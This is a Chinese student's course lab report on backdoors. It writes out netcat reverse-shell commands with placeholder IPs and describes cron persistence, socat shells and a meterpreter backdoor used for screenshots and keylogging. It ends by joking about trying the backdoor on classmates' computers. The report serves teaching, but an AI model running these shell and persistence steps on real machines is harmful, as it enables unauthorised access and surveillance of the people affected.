zoukankan      html  css  js  c++  java
  • 20145222 黄亚奇 《网络攻防》 后门原理与实践

    20145222 黄亚奇 《网络攻防》 后门原理与实践

    实验内容概述

    • 简单实用netcat和socat获取靶机shell,并实现任务计划启动;
    • 使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。

    基础问题回答

    • 例举你能想到的一个后门进入到你系统中的可能方式?
      通过邮件发送,并不小心点开了恶意链接;
      U盘里的文件不安全,插入电脑将其文件保存在电脑内;
      上不可靠、不安全的网站,误点小广告;
      云盘里共享的文件可能带有恶意代码,将其下载并保存在了电脑里。
    • 例举你知道的后门如何启动起来(win及linux)的方式?
      自己不小心点击运行了后门程序;
      篡改了注册表,将其设为开机自动运行;
      被控端被设置了cron启动,定时循环启动;
      被控端被设置了任务计划启动,在被控端达到某个条件时程序运行,且此时控制端可自由连接控制被控端;
      与其他具有正常功能的程序进行了绑定,在运行正常程序时,连带着运行后门;
      后门被设置为成服务,且其名字与系统服务名字类似。
    • Meterpreter有哪些给你映像深刻的功能?
      可以将后门程序迁移到其他正在运行的正常程序里,能隐藏得很深
      可以用被控端的命令,截个当前被控端的屏幕、获取被控端的键盘录入
      可以使用MSF自带的POST模块,像导出被控端用户密码之类的
    • 如何发现自己有系统有没有被安装后门?
      查看注册表、进程、服务等,是否有未知的程序

    实验过程

    1.使用netcat获取主机操作Shell,cron启动

    1-1 linux获取windows的shell

    • windows 打开监听:ncat.exe -l -p 5222;
    • Linux反弹连接win: nc ip_of_win 5222 -e /bin/sh;
    • windows下获得一个linux shell,可运行任何指令,如ls.

    1-2 Linux获得Windows的Shell

    • Linux运行监听指令:nc -l -p 5222;
    • Windows反弹连接Linux:ncat.exe -e cmd.exe ip_of_linux 5222;
    • Linux下看到Windows的命令提示:

    • 通过在kali中输入cmd命令write来控制(打开)win系统的写字板:

    2.设置cron启动,使用netcat获得linux shell

    • 使用cron指令设置定时任务并查看

    • 设置:在40分的时候,win成功获取Linux的shell;其中一直打开necat监听。

    3.使用sotcat:win获得linux shell

    • 在linux中,使用socat绑定bash与端口号,监听,等待连接;
    • win中使用socat对linux进行tcp固定端口连接,成功获取linux shell。

    4.使用MSF meterpreter生成后门并传到被控主机获取shell

    • 创建后门,可执行程序复制kali原有的的然后改个名,输入命令行传送程序至windows;

    • msf打开监听,ip和端口号等参数要进行修改,跟后门一致。

    • 这时再双击启动win上的可执行文件,linux成功获取win shell

    • 使用MSF meterpreter生成获取目标主机某些内容:截屏。

    实验感想

    没了杀毒软件和防火墙,电脑真的好脆弱,一句感慨:这几年来,我可能用的是一台“假的”笔记本,无数双“眼睛”都在盯着我的操作。做完实验才知道真的要多多加强电脑的自我保护。
    这个实验做完之后感觉其实挺简单的,但自己却花了大量时间来完成,说明自己练习还是太少,对于电脑一些的操作还是很生疏,需要多练一练。
    通过这次实验,自己也掌握了后门程序的一些应用知识,知己知彼,方能百战百胜。实验完后,都忍不住拿同学的电脑来做实验了,哈哈。

  • 相关阅读:
    Java web 例4-7
    JavaScript初步+基本函数
    请求转发和重定向区别
    javaben的设计规则
    Java web 实验五 Servlet过滤器
    关于软件生命周期以及软件过程
    Java web outTime.jsp
    Java web 4-6 update_stu_1.jps
    include指令与动作,请求妆发等同于forward动作
    简单的购物车应用案例 相关代码2
  • 原文地址:https://www.cnblogs.com/huangyaqi/p/6554896.html
Copyright © 2011-2022 走看看